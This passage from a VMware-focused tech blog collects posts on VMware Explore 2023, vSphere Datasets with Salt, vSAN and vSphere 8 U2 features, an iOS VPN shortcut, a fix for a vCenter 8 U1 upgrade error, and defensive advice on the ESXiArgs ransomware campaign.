Go to the content catalog and book the sessions you want to attend. The sessions tend to fill up quite quickly, so if you don’t get a spot, add the session as a favorite and show up before it starts. Sometimes people overbook and then don’t show up for all the sessions they book. It’s also important not to overbook yourself. Remember that you need time to move from one session to another, and time to eat, have a break, etc. I recommend the sessions held by my friend and colleague Christian Mohn: VMware Community Panel: Level Up Your Career Through Community Participation [VIB2311BCN] Down the Rabbit Hole with VMware Aria Automation Config (SaltStack) [VMTN2239BCN] And the session held by my friend Rudi Martinsen: GitOps for Your Scheduled Tasks [VMTN2221BCN] They are both extremely technically skilled and they hold very good presentations.

The Venue #

Bring comfortable shoes. You’ll be walking back and forth at the venue for days. You’ll end up standing around and talking to a lot of people, so I’d recommend some good trainers. Bring a good backpack for your laptop, chargers and whatever else you’ll need to spend hours away from the hotel. If you’re like me and love some good merch, you’ll also need space for that.

Social Events #

There are a lot of social events you can attend at night.
Remember not to overbook yourself, to avoid becoming so tired you need to skip some of the sessions you’ve been wanting to attend. Lastly, I just want to say: arrive early at everything you really want to attend, and remember to have fun! --- # VMware Explore 2023 Barcelona: My Sessions URL: https://vNinja.net/2023/09/26/vmware-explore-2023-barcelona-my-sessions/ Date: 2023-09-26 Author: christian Tags: VMware, Explore, Talk VMware Explore Barcelona 2023 is fast approaching; the 6th to 9th of November is only a little over a month away. The content catalog is now open for scheduling, and I’m lucky enough to have two sessions lined up this year. First, I’ll be doing a Breakout Session on Tuesday, Nov 7, 11:45 AM - 12:30 PM CET: VMware Community Panel: Level Up Your Career Through Community Participation [VIB2311BCN] This should be a good one, joining Corey Romero, Senior Community Manager, VMware; Andrew Nash, Principal Systems Engineer, Motorola; Brian Graf, Director, VMware{code} Community, VMware; and Tim Burkard, Staff Technical Learning Engineer, VMware, for a panel discussion. Later on the same day, I’ll also be presenting a VMTN Tech Talk at 16:00 - 16:25 CET: Down the Rabbit Hole with VMware Aria Automation Config (SaltStack) [VMTN2239BCN] If any of these are of interest, go ahead and add them to your schedule now. Seats are filling up fast, at least they did last year! Looks like I’ll have a very busy Tuesday, and I hope to see you there! --- # Using vSphere Datasets in Salt URL: https://vNinja.net/2023/09/25/vsphere-datasets-in-salt/ Date: 2023-09-25 Author: christian Tags: vSphere, vCenter, vSphere Datasets, Salt vSphere 8 introduced the new vSphere Datasets feature. In short, Datasets provide a way to exchange information (metadata) between vCenter and a VM, readable/writeable through VMware Tools, which is a pretty powerful option.
vSphere Datasets architecture diagram

William Lam has written a great introduction to the concept, vSphere Datasets - New Virtual Machine Metadata Service in vSphere 8; see that for details, including some great code examples on how to create and use Datasets. The official documentation is a good resource: What are vSphere DataSets? I thought this might be a nice way to pass information from vCenter, or a VM, to Salt in order to use this metadata information on a Salt minion. Thankfully, this was fairly easy to accomplish.

1. Create a Dataset via PowerShell #

First we need a Dataset to store metadata in. By creating a Dataset called salt-ds, I created a location to store data that I want to access from the Salt minion in a VM. This dataset is writeable by vCenter (HostAccess) and readable (GuestAccess) from the VM. Replace the value for vm-id in $vm_moref with a valid ID for a VM.

PowerShell Code #

```powershell
$vm_moref = "vm-id"

$adminDataSetParam = @{
  Name = "salt-ds";
  Description = "Dataset for Salt";
  VMMoref = $vm_moref;
  GuestAccess = "READ_ONLY";
  HostAccess = "READ_WRITE";
  OmitFromSnapshotClone = $false;
}

New-VMDataset @adminDataSetParam
```

Set AppID value for salt-ds DataSet #

This creates a Dataset entry called AppID which has the value of pihole, for a given VM. In this example, I use pihole as the value, as I have automated installation of Pi-Hole through Salt already.

PowerShell Code #

```powershell
$sharedDataSetEntry1Param = @{
  Name = "AppID";
  VMMoref = "vm-id";
  Dataset = "salt-ds";
  Value = "pihole";
}

New-VMDatasetEntry @sharedDataSetEntry1Param
```

Reading and formatting DataSet entries from VMware Tools #

Once the DataSet is created, and populated with data, this can be accessed and read through VMware Tools inside the VM (example is for a Linux VM).
Bash commands #

```shell
sudo vmtoolsd --cmd 'datasets-get-entry {"keys": ["AppID"], "dataset":"salt-ds"}'
{ "result": true, "entries": [ { "AppID" : "pihole" }] }
```

This returns the JSON output from VMware Tools, but in order to use this data in an easy way, I piped it through jq, extracting only the entries for .AppID in the salt-ds dataset:

```shell
sudo vmtoolsd --cmd 'datasets-get-entry {"keys": ["AppID"], "dataset":"salt-ds"}' | jq -r '.entries[].AppID'
pihole
```

This command only returns the value for the AppID entry, and nothing else, perfect for picking it up somewhere else.

Tying it together with Salt #

In order to use this from Salt, I created a state file that copies my script from the Salt master to the minion. It then executes the script locally, sets a grain based on the output, and deletes the script when done. This means that the value in AppID, returned from VMware Tools, gets set as a targetable object in Salt, making it possible to do further actions based on the grain itself, like automatically installing Pi-Hole based on the grain being present and set with a given value.

vSphere Datasets state file (init.sls) #

```yaml
copy-script:
  file.managed:
    - name: /tmp/script.sh
    - source: salt://{{ slspath }}/script.sh

roles:
  {% set AppID = salt['cmd.run']('/bin/sh -c "/tmp/script.sh"') %}
  grains.present:
    - value: {{ AppID }}

delete-script:
  file.absent:
    - name: /tmp/script.sh
```

These files, along with other Salt state files etc., can be found in my GitHub repository. The state file, and script, for utilizing vSphere Datasets are found here. This is just an example of how vSphere Datasets can be used in conjunction with other products, like Salt (or Aria Automation Config). By utilizing vSphere Datasets to exchange data between vCenter and the VM, this can be accomplished without having to provide credentials to any of the solutions used.
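The script the state file copies to the minion is essentially the vmtoolsd-plus-jq pipeline shown above, printing only the AppID value so Salt can store it in a grain. Since vmtoolsd only works inside a VM with VMware Tools, the sketch below (a hypothetical stand-in, not the repository's script) demonstrates the jq extraction against the sample JSON from the post instead:

```shell
#!/bin/sh
# Demonstrate the extraction using the sample VMware Tools output above.
sample='{ "result": true, "entries": [ { "AppID" : "pihole" }] }'
echo "$sample" | jq -r '.entries[].AppID'
# prints: pihole

# Inside an actual VM, the script body would be the real pipeline:
# vmtoolsd --cmd 'datasets-get-entry {"keys": ["AppID"], "dataset":"salt-ds"}' \
#   | jq -r '.entries[].AppID'
```

Because the script emits nothing but the bare value, the cmd.run output in the state file can be dropped straight into grains.present.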
The vCenter administrator does not need to have permissions to log in to the VM to be able to set the metadata, and the VM administrator does not require vCenter credentials to be able to read it. vSphere Datasets also follow cloned VMs, so this can be utilized on templates as well. --- # Tech X 300 2023: Wrapped URL: https://vNinja.net/2023/09/23/techx-300-2023-wrapped/ Date: 2023-09-23 Author: christian Tags: Speaking, TechX300, VMUG VMUG Denmark put on the (northern European?) VMUG event of the year on the 20th and 21st of September: Tech X 300. It was held at the beautiful Nordisk Film Biografer Palads cinema in Copenhagen, which offers great rooms for the presentations, along with huge screens. I think the largest one was over 12 meters wide! Room A was a large theater! All in all, it was a great event with a number of excellent speakers. I was fortunate enough to be included, and did my Down the Rabbit Hole with VMware Aria Automation Config (SaltStack) talk (apologies to the speakers behind me on the schedule, as I ran over my time slot quite a bit. I need to work on that before VMware Explore). The whole event was very well organized, and the content was really great. I especially enjoyed the opening keynote by Richard Garsthagen, who walked us through most of the history of the extended VMware community, from its beginnings until now. Combine that with an interactive Kahoot! and you’ve got yourself a winner. Well done Richard! Of course, the technical content was top notch, as expected when looking at the speaker list, but I have to say I really enjoyed the non-technical talks as well. Both days of the event ended with a closing keynote, of a decidedly non-technical nature. Day one was “I’m OK, You’re OK, We’re OK: Living With AD(H)D In Infosec” by Klaus Agnoletti. This was a very personal, but also eye opening, talk about how Klaus deals with his ADHD.
Day two ended with a fantastic non-slide talk by Thor Pedersen, about the “Once Upon a Saga”-project, his 10-Year Journey Visiting All 203 Countries in the World Without Flying. An absolutely inspiring and heartwarming tale of an impossible project. This content was fantastic. It is a great idea to invite people to a technical two-day event, and end each day with something completely different. We all need other perspectives and other things to contemplate. Thank you VMUG DK for giving us that opportunity; I know this was greatly appreciated by many of the attendees! To the Danish VMUG crew: Yet again you pulled it off! You are truly an inspiration, and you do set a high bar for the rest of us. I hope I get the chance to both attend, and present, at future events you put on. To attendees and speakers: Thank you for showing up and contributing. I really enjoyed the interactions we had during these couple of days, and in my mind this shows that we still need physical events. While remote and video meetings/events work, they just are not the same. --- # VMware vSAN 8 U2 Announced at Explore 2023 URL: https://vNinja.net/2023/08/22/vmware-vsan8u2/ Date: 2023-08-22 Author: christian Tags: vSphere, vSAN, VMware, ESXi At VMware Explore US 2023 in Las Vegas, VMware announces vSAN 8 U2! At the time of writing, no set General Availability date has been published, but look for it being available some time this fall. Some details may also change before the product hits the market. vSAN 8 U2 — What’s new # Nothing really big and revolutionary in the core vSAN 8 U2 announcement, besides vSAN Max that is. It is nice to see that native file services in vSAN ESA are now in feature parity with vSAN OSA, and that the configuration of 2-Node and Stretched Clusters has been simplified. Other than that, everything else seems to be performance improvements, simplified management and scalability improvements, but no stand-out new features in the core offering itself.
Here’s a quick rundown of the improvements in vSAN 8 U2 #

vSAN ESA now supports native file services #

- Supports NFS and SMB protocols for traditional and cloud native clients
- Feature parity with vSAN file services in Original Storage Architecture

Adaptive Write Path Optimizations in vSAN ESA #

- Use of more in-memory I/O banks to process incoming writes more quickly
- Dynamic and scalable based on the demands of the workloads
- Improves aggregate and single object (VMDK) performance in vSAN ESA
  - Higher IOPS
  - Higher throughput
  - Lower latency

Improved Performance for Disaggregated Environments #

- Dynamically uses optimal write path for guest VM writes
  - Default write path
  - Large I/O write path
- Includes other optimizations made to Adaptive Write Path in vSAN 8 U2
- Better performance in disaggregated environments
  - Up to 200% higher write throughput
  - Up to 70% reduction in latency

Higher Throughput and IOPS for I/O Intensive Workloads #

- Improved parallelism with vSAN ESA’s object manager client
- Delivers higher IOPS and throughput for single object, I/O intensive workloads
- Complements I/O processing improvements in vSAN 8 U1
- Reduces potential bottleneck conditions high in the storage stack
- Most beneficial for:
  - Mission critical applications, databases, etc.
  - Resource intensive VMs
  - Single object (VMDK) performance evaluations

Support for up to 500 VMs per host in clusters running vSAN ESA #

- 2.5x the density of earlier versions
- Allows for new high-density cluster designs
  - Exploit benefits of vSAN ESA
  - Capacity efficiencies using erasure coding
  - Minimal resource overhead
  - High performance

New ReadyNode profile and support for Read-Intensive devices for vSAN ESA #

- New ReadyNode profile ideal for small data centers and edge environments
  - Dramatically lower TCO while benefiting from capabilities in ESA
  - New snapshots
  - Smaller failure domains
  - Improved efficiency
- New support for Read-Intensive NVMe devices
  - Available in some ReadyNode profiles
  - Supported on vSAN 8 U1 and later

Auto-Policy Management improvements in vSAN ESA #

- Improves Auto-Policy Management feature introduced in vSAN 8 U1
- Single click “Update Cluster DS Policy” to remediate change
- Updates prescribed, cluster-specific storage policy if number of hosts in cluster change
- Streamlines handling of ongoing changes to cluster, reduces manual intervention

Capacity overhead reporting improvements in vSAN ESA #

- Provides “ESA object overhead” in cluster capacity usage breakdown view
- Represents capacity consumed for vSAN’s log-structured filesystem (LFS) for all object and replica data

vSAN ESA Prescriptive Disk Claim #

- Uses new outcome oriented “desired state” disk claiming model
- Define disk claim criteria for hosts in cluster, and let vSAN take care of the rest
- Provides consistency to disk claiming process for initial deployment and cluster expansion
- Continuous checks of compliance to desired state
- Available using API and CLI

Support for key expiration with Data-at-Rest Encryption in vSAN OSA and ESA #

- Support of key expiration standard for KMIP-based Key Management Servers
- Integrated with Skyline Health for vSAN
- Triggered health finding will provide:
  - Days remaining on valid keys
  - Convenient way to perform a shallow rekey

Skyline Health for vSAN remediation enhancements #

- Health finding recommendations customized to specific versions of vSAN
- Improved information on risks of not remediating triggered finding
- More prescriptive options to fix identified issue
  - Default
  - Alternative
- New endurance monitoring of NVMe devices in vSAN ESA

Top Contributors enhancements in vSAN OSA and ESA #

- Find performance hot spots over a customizable time period when diagnosing performance issues
- Multiple source types available for analysis
  - VMs
  - Hosts (frontend)
  - Hosts (backend)
  - Host disks
- Transpose other top contributors in same performance view to understand correlations

I/O Trip Analyzer for 2-Node and Stretched Clusters in vSAN OSA and ESA #

- Capture diagnostics data on workloads running in a vSAN stretched cluster or 2-node cluster
- Easily identify primary source of latency
  - Outstanding I/Os of object
  - Network link across sites
  - Network links within sites
  - Host storage devices
- Supports all data placement schemes
  - RAID-1
  - RAID-5
  - RAID-6

Witness Traffic Separation and other configuration improvements in vSAN OSA and ESA #

- Easily configure Witness Traffic Separation in UI
- Removes need for CLI commands to properly tag witness traffic
- Applies to both 2-Node and stretched clusters
- New support for “medium” sized witness host appliance in vSAN ESA
- New support in vLCM to manage lifecycle of all witness host appliance types

--- # VMware vSAN 8 U2 to the Max URL: https://vNinja.net/2023/08/22/vmware-vsan8u2-to-the-max/ Date: 2023-08-22 Author: christian Tags: vSphere, vSAN, VMware, ESXi At VMware Explore US 2023 in Las Vegas, VMware announces vSAN 8 U2 with the new vSAN Max™ architecture! At the time of writing, no set General Availability date has been published, but look for it being available some time this fall. Some details may also change before the product hits the market. vSAN Max # The clear stand-out new offering in vSAN 8 U2 is the new Disaggregated Storage offering called vSAN Max™.
Broken down to its core, this is vSAN HCI Mesh on steroids, with some new and very shiny sprinkles on top. vSAN Max™, with its new license model, is a dedicated storage cluster, built on vSAN ESA. A vSAN Max™ cluster only provides storage resources, and does not run traditional VM workloads. This storage cluster can be consumed by other vSphere clusters, either as a primary storage option or in addition to the storage those clusters already consume from other sources. This allows for the disaggregation of compute and storage resources, while at the same time offering the benefits of integrated management. vSAN Max™ also supports stretched clusters, for a true enterprise multi-site setup. A single host can offer up to 360 TB of pure NVMe storage, allowing vSAN Max™ to scale into the petabyte territory. vSAN Max™ client clusters can be traditional vSphere clusters or vSAN ESA clusters. These clusters can be managed by the same or a different vCenter Server than the vSAN Max clusters. Storage traffic goes over the vSAN networking stack.

Planned Consumption and Deployment Model #

- vSAN Max™ will be a new offering in the vSAN family
  - Existing vSAN editions will not include vSAN Max™
- Licenses contain all necessary entitlements
  - For any vSphere cluster or Cloud Edition
- Planned with a new per-TiB licensing model
  - Existing vSAN editions will still have a per-core licensing model
  - Minimum per-TiB required to purchase
- Requires new ESA-based vSAN Max certified ReadyNodes
- Requires min. of 6 nodes, 150 TiB/node (minimum total vSAN size equals 900 TiB)
- No support for in-place upgrades from other vSAN editions

My Thoughts #

This is an interesting move by VMware. Offering a “pure storage solution” is new, but it makes sense, as one of the inherent problems with HCI in general is scaling storage independently of compute. This takes care of that, and at the same time it allows for smaller vSphere clusters to get the performance benefits of larger ones.
In environments where smaller clusters are beneficial, like database clusters (for licensing purposes), you’d normally take a performance hit, or go with external dedicated storage. This allows for the best of both worlds, while still allowing you to stay within the licensing boundaries, as vSAN Max doesn’t allow you to run VMs on those clusters. That eliminates a pain point in many licensing discussions. Of course, this also depends on how VMware is going to price the licensing for vSAN Max™, which is unknown at this time. At the same time, this proves that VMware really believes in vSAN ESA. It has only been a year since vSAN ESA was announced, yet this new edition shows that it can do what VMware anticipated it could, and VMware now wants to go head to head competing with external storage vendors. I also wonder if this means we’ll see vSAN Max™ clusters running on non-x86 architectures in the future. Why not run it on ARM CPUs, and utilize the high core count for even faster deduplication, compression and encryption? Since vSAN Max™ is licensed on capacity and not sockets/cores, it could quite possibly be on a future roadmap. Where do things like DPUs fit in this picture? Can those be utilized to offload processing in the future? I am sure there is more to come here as well, seeing that vSAN ESA seems to allow a more rapid pace of development. --- # VMware vSphere 8 U2 Announced at Explore 2023 URL: https://vNinja.net/2023/08/22/vmware-vsphere8u2/ Date: 2023-08-22 Author: christian Tags: vSphere, VMware, ESXi At VMware Explore US 2023 in Las Vegas, VMware announces vSphere 8 U2! At the time of writing, no set General Availability date has been published, but look for it being available some time this fall. Some details may also change before the product hits the market. vSphere 8 U2 — What’s new # Like with vSAN 8 U2, there are really no new stand-out features in the vSphere 8 U2 announcement.
It is an evolutionary release, with a number of welcome improvements both to hardware support and sane defaults for security and hardening, but no eye-popping new features. I do appreciate everything that makes certificate management easier though, so I’m glad to see improvements there. Here’s a quick rundown of the improvements in vSphere 8 U2 # vSphere+ # vCenter Lifecycle Management Now available with Free Trial Test Upgrades for cloud-connected environments Upgrade of vCenter Instances in vCenter HA mode is now supported One-time configuration Supports vCenter HA instances deployed using automated configuration Global Subscription Usage reports Overall subscription usage Actual vs billable Commitments, unused cores, overage and more. ESXi Lifecycle as a Service (vSphere+ Early Access) Create ESXi image definitions and apply to multiple clusters and across vCenters Roll out upgrades to one or more clusters from a single interface Monitor upgrade process using a cloud dashboard Update vCenter with Minimal Downtime # Reduced Downtime Upgrade for on-premises deployments Migration-based upgrade New vCenter appliance deployed Downtime only during switchover (~5 minutes) Resilient vCenter Patching # Prompt to take a vCenter backup before patching Automatic LVM snapshot taken during patching Patching can be resumed on failure or rolled back Non-Disruptive Certificate Management # Renew or replace vCenter Server certificates without service restart No need to schedule downtime May require other systems to reauthenticate or re-accept Reliable Network Configuration Recovery # vSphere Distributed Switch changes pushed from cluster(s) to vCenter Supports vSphere Distributed Switch using VMware NSX vSphere Identity Federation with Entra ID/Azure AD # Microsoft Entra ID/Azure AD added to direct Federation options All other identity choices still available vSphere Security Configuration & Hardening # Updated product defaults mean out-of-box protections Updated hardening guidance
to reflect changes in the security landscape Lifecycle Managing vSAN Clusters with enhanced vSAN Witness Support # vSphere Lifecycle Manager can manage the image of vSAN witness nodes independently of the vSAN cluster Supports shared vSAN witness nodes End-to-End Desired State Configuration Management # End-to-end UI workflows Edit and apply configuration Streamlined Windows Guest Customization # Active Directory OU path can be specified during Windows guest customization Descriptive Error Messages when Files are Locked # Easily identify the source of locked VM files from the vSphere Client. No need to run CLI commands or review busy logs IP Address and MAC of the host holding the file lock are reported Improved Placement for GPU Workloads # DRS makes smarter placement decisions for vGPU-enabled VMs vGPU-enabled VMs are automatically migrated to accommodate larger VMs Quality of Service for GPU Workloads # Estimated stun time calculated based on assigned vGPU profile Administrators can define max acceptable stun time Virtual Machine Hardware Version 21 # 16 vGPU devices per VM 256 Disks per VM (64 disks x 4 vNVMe adapters) NVMe 1.3 support for Windows 11 and Windows Server 2022 Support for WSFC using NVMe adapters RHEL 10 / Oracle Linux 10 / Debian 13 / FreeBSD 15 Streamlining Supervisor Cluster Deployments # Export Supervisor configuration Import to streamline new Supervisor deployments Clone Supervisor Configuration to new cluster Expanding NSX Advanced Load Balancer Support # NSX Advanced Load Balancer supported in NSX-based Supervisor Clusters.
Greenfield Supervisor Clusters Introducing Windows VM support for VM Service # VM Service compatible with Windows-based templates Transport type Sysprep used for customization Self-Service VM Image Registry # DevOps users manage content library items using kubectl DevOps users publish new items to the library Content Libraries shared between namespaces or individual namespaces Read and write permissions defined per namespace --- # iOS VPN Connection Toggle Shortcut URL: https://vNinja.net/2023/07/17/ios-shortcut-toggle-vpn/ Date: 2023-07-17 Author: christian Tags: iOS, iPhone, MacOS I have probably been living under a rock for quite some time, but it turns out iOS Shortcuts (and MacOS) are pretty awesome, once you identify a proper use case for them. For me, the use case was simplifying connecting to my home, or work lab, network via VPN. Now, I am pretty sure I looked into how to do this years ago, without finding a solution, but in case someone else might benefit from it, here is a walkthrough of creating a simple VPN toggle button on your iOS homescreen, i.e. no more diving into settings to connect. 1. Toggle VPN connection Shortcut Button or Widget # For some reason iOS does not provide a native VPN widget, or a way of quickly toggling a VPN connection without navigating into settings. Luckily iOS Shortcuts provides a way of doing that, which works very well. I have tested this for both “native” L2TP VPN connections and WireGuard connections. How to configure a VPN Toggle button on iOS # Open the Shortcuts app and tap the “+” button in the upper-right corner. Tap the arrow beside “New Shortcut”, select Rename and put in whatever you want to call it. I used “Toggle VPN (vpn name)”. Tap on “Add Action” and search for “Set VPN”. By default the action for the Shortcut is “Connect”, which will connect to a VPN. In this case, I wanted a toggle switch to either connect or disconnect a VPN connection. Change this by tapping on “Connect” and changing it to “Toggle”.
Tap on VPN to select which connection you want to use. Tap the arrow beside your shortcut name again and select “Add to Home Screen”. This brings up a preview of the selected icon and name for the Shortcut. To add it to your home screen, tap on “Add” in the top right-hand corner. This adds the new toggle shortcut to your home screen, and it should now work like this: A simple click to toggle the VPN connection. Nice! --- # VMUG TechX 300 Here I Come! URL: https://vNinja.net/2023/06/27/techx-300-here-i-come/ Date: 2023-06-27 Author: christian Tags: Speaking, TechX300, VMUG On September 20th - 21st 2023, VMUG Denmark is hosting TechX 300 which, in their own words, is “the ultimate technical summit for enthusiasts seeking a deep dive into VMware solutions”: TechX 300 – Powered by VMUGDK This is the ultimate technical summit for enthusiasts seeking a deep dive into VMware solutions. We are hosting a Level 300 deep technical event in Copenhagen for IT professionals, system administrators, and other technology enthusiasts. Get ready to elevate your expertise and shape the future of virtualization at TechX 300! This will be a hardcore technical event hosted by hardcore techies for hardcore techies. We consider this to be an extension of VMware Explore and we focus on creating the opportunities needed to interact with speakers and engineers in the Breakout, Lightning, and Community sessions, as well as at Meet-the-Experts, in smaller group discussions, in the Solution Exchange, and during the overall event. Register for TechX 300 Now! I am very happy to announce that I’ve been accepted as a speaker for the event! My talk is called Down the Rabbit Hole with VMware Aria Automation Config (SaltStack), and I guess it’s time I start building my whole mad scientist lab environment for the live demos I plan on running. Thankfully I still have time to work it all out before the conference.
I’m honored to have been selected again, as I also had speaking slots at VMUG Nordic UserCon in 2015 and 2019. Seems like every four years is a pattern! A few days in Copenhagen is never wrong, and combining it with an awesome event featuring a number of fantastic speakers (and me) makes it even better. I can’t wait! --- # IT Architect Series: Stories From the Field, Volume 2 URL: https://vNinja.net/2023/05/19/it-architect-series-stories-from-the-field-vol2/ Date: 2023-05-19 Author: christian Tags: Recommended, Reading, Books Another book in the IT Architect series has finally been released: IT Architect Series: Stories from the Field, Volume 2 This is the follow-up to Volume 1, which was released back in 2020. I have had the privilege of making a chapter contribution to this second volume, just as I did for the first one, joining an all-star list of seasoned IT professionals. Don’t just take my word for it though, listen to Steve I'm helping to edit "IT Architect Series: Stories from the Field Vol2" this weekend (@vcdx001 & @MarkGabbs). Fascinating lessons learned along these lines from some of the world's best IT architects. — Steven Kaplan (@ROIdude) November 19, 2022 Order your copy today! — I can’t wait to get my hands on a physical copy of it! And who knows, perhaps there’s even a Volume 3 in the works? Book Details # Pages: 233 Synopsis # What is it like to be engaged on an IT project when it turns into a horror story?! Volume 2 continues with more stories from leading IT Professionals who describe their most challenging Datacenter projects and provide insights into why failures occurred, including lessons learned and what they would do differently.
Recommended reading for members of the IT Community who deliver solutions in the field and want to avoid learning the hard way. Table Of Contents # My Lessons in ROI A Cut Too Far Assumptions to the Rescue Assumptions are the Root of All Evil A Flip of the Switch If You Do Not Ask, You Do Not Get Father Time Stakeholders, Requirements, and the Project Confidence Is Key Stand by Your Team Is Your Cloud White, Black, or Gray? Holy Grail – What a Fail! None of Their Business Alignment, Cooperation, and Evaluation Sometimes Compression Matters When the Levee Breaks Design by License Admitting Defeat Chasing a Unicorn The Perils of Overselling The Greener Grass of Greenfield? Purpose and Scope Observe, Learn, and Say Something Stories from the Field: Retrospective IT Architect Series and Other Works About the Editors and the Artist Authors and Contributors # Editor-in-chief: Matthew Wood Managing editor: John Arrasjid Selected by: Mark Gabryjelski Foreword by: Steve Kaplan Cover design or artwork by: Ioannis Authors: Abdullah Abdullah, Chris Noon, Chris Porter, Christian Mohn, Dave Cook, Doug Baer, Faisal Hasan, Graham Barker, Jason Yao, Jeffrey Kusters, Joe Clarke, John Arrasjid, Matthew Wood, Matthieu Braga, Marco Lopez, Mark Gabryjelski, Michael Francis, Paul Cradduck, Phoebe Kim, Russell Pope, Sachin Dharmadhikari, Steve Kaplan, Tony Foster, Wesley Geelhoed, Yves Sandfort. --- # Upgrading to vCenter 8 Update 1: Invalid Type, expected String, instead got NoneType URL: https://vNinja.net/2023/04/19/upgrading-vcenter8-invalid-type/ Date: 2023-04-19 Author: christian Tags: vSphere, vCenter, VMware vCenter 8.0 Update 1 was released on April 18th, and I quickly jumped to upgrading my existing home lab vCenter, but ran into an issue that prevented the upgrade from completing, namely the error message “Invalid Type, expected String, instead got NoneType”.
Obviously something was wrong with my current vCenter installation, but finding out what was needed to correct it wasn’t straightforward. Thanks to my partner in crime, and notorious human log file parser, Espen Ødegaard, I found the following in /var/log/vmware/applmgmt/PatchRunner.log:

```
2023-04-19T09:10:39.560Z vpxd:Expand ERROR vmware_b2b.patching.executor.hook_executor Patch hook 'vpxd:Expand' failed.
(...)
Traceback (most recent call last):
xml.etree.ElementTree.ParseError: not well-formed (invalid token): line 40, column 7
```

Note: The log output has been truncated for legibility. Clearly something is not conformant in the vpxd.cfg file on my vCenter, on line 40. Opening /etc/vmware-vpx/vpxd.cfg showed the following:

```
38 <vcls>
39 <clusters>
40 <78ed4e3c-4f28-4d27-a0d5-01182e957269>
41 <enabled>true</enabled>
42 </78ed4e3c-4f28-4d27-a0d5-01182e957269>
43 </clusters>
44 </vcls>
```

This is not correct: it should be referencing <domain-id>, and not a UUID, on lines 40/42. It seems I messed up the procedure for cleaning up vCLS VMs at some point, putting the wrong configuration in as a vCenter Advanced setting. Check Putting a Cluster in Retreat Mode for the correct procedure and how to obtain the correct domain-id. I tried cleaning this up via the vCenter Web Client, but could not find the config.vcls.clusters.domain-c(number).enabled configuration parameter at all, even when searching for only cls.
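Since the patch hook failed on an ElementTree parse, the quickest way to verify a fix before re-running the upgrade is to feed the configuration through the same parser. A minimal sketch (the tag names below are shortened stand-ins for the post’s example, not the full file):

```python
import xml.etree.ElementTree as ET

def first_parse_error(xml_text: str) -> str:
    """Return 'OK', or the position of the first malformed XML token."""
    try:
        ET.fromstring(xml_text)
        return "OK"
    except ET.ParseError as err:
        line, col = err.position
        return f"not well-formed at line {line}, column {col}"

# An element name starting with a digit -- like a bare UUID used as a
# tag -- is invalid XML, which is exactly what PatchRunner.log flagged.
broken = "<vcls><clusters><78ed4e3c><enabled>true</enabled></78ed4e3c></clusters></vcls>"
fixed = "<vcls><clusters><domain-c59002><enabled>true</enabled></domain-c59002></clusters></vcls>"
print(first_parse_error(broken))
print(first_parse_error(fixed))  # OK
```

Running the real file through the same check on the appliance (`ET.parse("/etc/vmware-vpx/vpxd.cfg")`) confirms the fix without waiting for another failed upgrade attempt.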
Manually cleaning up vpxd.cfg did the trick though, correcting the configuration to the following:

```
38 <vcls>
39 <clusters>
40 <domain-c59002>
41 <enabled>true</enabled>
42 </domain-c59002>
43 </clusters>
44 </vcls>
```

Once this was fixed, I restarted the vCenter appliance and restarted the upgrade process, but since there was already a failed upgrade attempt I had to clean up the failed upgrade state by running the following via SSH on the vCenter appliance:

```shell
service-control --stop applmgmt
rm -rf /storage/core/software-update/updates/*
rm -rf /storage/core/software-update/stage/*
rm -rf /storage/db/patching.db
mv /storage/core/software-packages/staged-configuration.json /storage/core
mv /etc/applmgmt/appliance/software_update_state.conf /storage/core
service-control --start applmgmt
```

Ref: vCenter Server update fails with error “Installation failed - Install in progress - You have reached maximum number of retries to resume the patching. Please restore the vCenter using the backup.” (87238). Once that step was performed, a new upgrade attempt was made, this time with a successful result! Obviously, putting wrong configuration settings in, either via vCenter Advanced Parameters or by editing vpxd.cfg directly, can get you into trouble, and should be avoided in production environments. --- # Are Your (old) ESXi Hosts Publicly Available? — They won't be for long. URL: https://vNinja.net/2023/02/06/are-your-esxi-hosts-publicly-available/ Date: 2023-02-06 Author: christian Tags: vCenter, VMware, ESXi Back in February 2021, I published a post named Is Your VMware vCenter Publicly Available?. It is February 2023, and here we are again. A new widespread ransomware attack dubbed ESXiArgs is targeting publicly available ESXi hosts, using a vulnerability that was patched two years ago (CVE-2021-21974). For details, see Massive ESXiArgs ransomware attack targets VMware ESXi servers worldwide.
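Checking whether a management interface even answers from a given vantage point takes nothing more than a TCP probe. A minimal sketch (the host name is a placeholder; 443 and 902 are the usual ESXi HTML client and host agent ports):

```python
import socket

def is_reachable(host: str, port: int, timeout: float = 3.0) -> bool:
    """True if a TCP connection to host:port succeeds within the timeout."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:  # refused, timed out, or name resolution failed
        return False

# Run this from a segment that should NOT have management access.
# The host below is a placeholder; any True result here is a finding.
# for port in (443, 902):
#     print(port, is_reachable("esxi01.example.com", port))
```

If this returns True from anywhere outside your admin network, let alone the internet, that reachability (not the hypervisor itself) is the first problem to fix.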
You really don’t want to wake up some day and see that your ESXi HTML Client has been replaced by a static web page, showing you how to pay the ransom… For now it seems to be contained to publicly available ESXi hosts, but remember, the same technique and vulnerability are also available on the inside of your perimeter firewall, so any internal client that can access your hosts could potentially be an attacker as well. Lessons to be learned here? # Don’t expose vCenter or ESXi hosts to the internet. No exceptions (except Honeypots of course) Ensure admin access (vCenter, ESXi and other management interfaces/APIs) is limited to clients that need it and is properly secured (think Zero Trust, Multi-Factor Authentication, etc.) Patch your stuff. To quote myself from two years ago: To be blunt: there is simply no valid reason why your VMware vCenter, or ESXi hosts, should be available over the internet, none whatsoever. In fact, it shouldn’t even be available from non-admin clients in your local network, let alone via the internet. If that is the case in your environment, odds are that there are probably other big issues present in your infrastructure as well. --- # VMware Explore 2023 Dates and Venues URL: https://vNinja.net/2023/01/06/vmware-explore-2023/ Date: 2023-01-06 Author: christian Tags: VMware, VMware Explore, Explore Update, 5 January 2023: The dates and locations for US and EMEA have now been made official by VMware at vmware.com/explore/. Some unofficial dates and details for VMware Explore 2023 have come to light, and by the looks of things the rumors of moving the US version from San Francisco to Las Vegas are true. It also seems like the EMEA conference will yet again be held in Barcelona.
Unconfirmed VMware Explore 2023 Details #

| Geo | Date | Location |
|---|---|---|
| Korea | April 6 - 7 | unknown location |
| India | April 11 - 12 | unknown location |
| US | August 21 - 24 | The Venetian Convention and Expo Center in Las Vegas |
| EMEA | November 6 - 9 | Fira Barcelona Gran Via in Barcelona |

